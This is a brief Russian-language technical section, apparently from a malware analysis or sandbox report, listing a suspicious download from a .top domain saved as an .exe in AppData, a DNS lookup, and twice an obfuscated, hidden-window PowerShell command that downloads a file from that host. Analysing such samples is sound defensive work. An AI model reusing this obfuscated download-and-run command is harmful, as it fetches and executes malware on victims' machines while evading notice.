Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^wERS^HElL^.ExE ^-EXECuTI^o^NPoLiCY byPass^ -no^P^R^O^f^ILe -w^i^nD^Owst^Y^Le H^IdD^en (N^eW^-^obJ^Ec^T sys^TEm.^nET.Web^cLiENT).dOwnlo^aDfIL^E('http://www.fopeioaas.top/r...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /c "p^O^wERS^HElL^.ExE ^-EXECuTI^o^NPoLiCY byPass^ -no^P^R^O^f^ILe -w^i^nD^Owst^Y^Le H^IdD^en (N^eW^-^obJ^Ec^T sys^TEm.^nET.Web^cLiENT).dOwnlo^aDfIL^E('http://www.fopeioaas.top/r...' (со скрытым окном)